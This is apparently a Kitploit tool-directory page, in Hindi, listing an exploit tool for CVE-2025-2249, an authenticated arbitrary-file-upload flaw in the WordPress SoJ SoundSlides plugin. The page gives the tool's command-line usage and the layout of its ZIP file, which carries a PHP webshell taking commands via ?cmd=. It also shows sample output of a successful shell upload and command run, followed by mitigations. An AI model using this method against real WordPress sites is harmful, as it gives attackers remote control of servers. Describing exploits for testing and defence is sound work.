Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2249 — WordPress SoJ SoundSlides Plugin <= 1.2.2 मनमानी फ़ाइल अपलोड के लिए संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-2249
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-2249

CVE-2025-2249

WordPress SoJ SoundSlides Plugin <= 1.2.2 मनमानी फ़ाइल अपलोड के लिए संवेदनशील है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔐 WordPress SoJ SoundSlides प्लगइन <= 1.2.2 - प्रमाणित मनमाना फ़ाइल अपलोड

⚠️ अस्वीकरण: यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।


📌 कमजोरी का सारांश

  • प्लगइन: SoJ SoundSlides  
  • प्रभावित संस्करण: <= 1.2.2  
  • प्रकार: प्रमाणित (योगदानकर्ता+) मनमाना फ़ाइल अपलोड  
  • पैच स्थिति: ❌ कोई आधिकारिक सुधार उपलब्ध नहीं

SoJ SoundSlides प्लगइन योगदानकर्ता या उच्चतर भूमिकाओं वाले प्रमाणित उपयोगकर्ताओं को मनमानी ZIP फ़ाइलें अपलोड करने की अनुमति देता है। मान्यता की कमी के कारण, हमलावर PHP वेबशेल अपलोड कर सकते हैं जो वेब-सुलभ निर्देशिका से निकाली और निष्पादित की जाती हैं।


💥 प्रभाव

एक हमलावर जिसके पास वैध WordPress क्रेडेंशियल हैं वह निम्नलिखित कर सकता है:

  • 📦 एक PHP शेल युक्त ZIP संग्रह अपलोड करें
  • 🖥️ दूरस्थ रूप से सिस्टम कमांड निष्पादित करें (?cmd=)
  • 🔓 साइट/सर्वर पर अनधिकृत नियंत्रण प्राप्त करें

🛠️ उपयोग

root@kitploit:~
usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,

options:
  -h, --help            show this help message and exit
  -u, --url URL         WordPress base URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
ArgumentDescription
-uWordPress बेस URL
-unWordPress उपयोगकर्ता नाम
-pWordPress पासवर्ड

✨ विशेषताएं

  • 🔍 प्लगइन readme.txt से संस्करण जांच
  • 🧰 आवश्यक संरचना और वेबशेल के साथ स्वचालित रूप से ZIP उत्पन्न करता है
  • 📤 कमजोर अपलोड एंडपॉइंट का शोषण करता है
  • 💻 अपलोड किए गए शेल के माध्यम से इंटरैक्टिव कमांड निष्पादन

📂 ZIP फ़ाइल संरचना

root@kitploit:~
nxploit/
├── index.html
├── data/
│   └── data.xml
├── audio/
│   └── audio.mp3
└── nxploit.php  ← PHP shell (?cmd=)

🧪 उदाहरण

root@kitploit:~
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data

🛡️ शमन

  • ❌ प्लगइन को अक्षम या हटाएं
  • 🧱 अपलोड प्रतिबंध लागू करें
  • 🔍 अप्रत्याशित .php फ़ाइलों के लिए wp-content/uploads/ की निगरानी करें

❤️ द्वारा निर्मित [Nxploited | Khaled ALenazi]
शिक्षा, जागरूकता और सुरक्षा के लिए।


🧠 अंतिम टिप्पणी

सुरक्षा सभी की जिम्मेदारी है। हमेशा नैतिक रूप से परीक्षण करें, जिम्मेदारी से रिपोर्ट करें, और वेब की रक्षा करें।

टूल डाउनलोड करें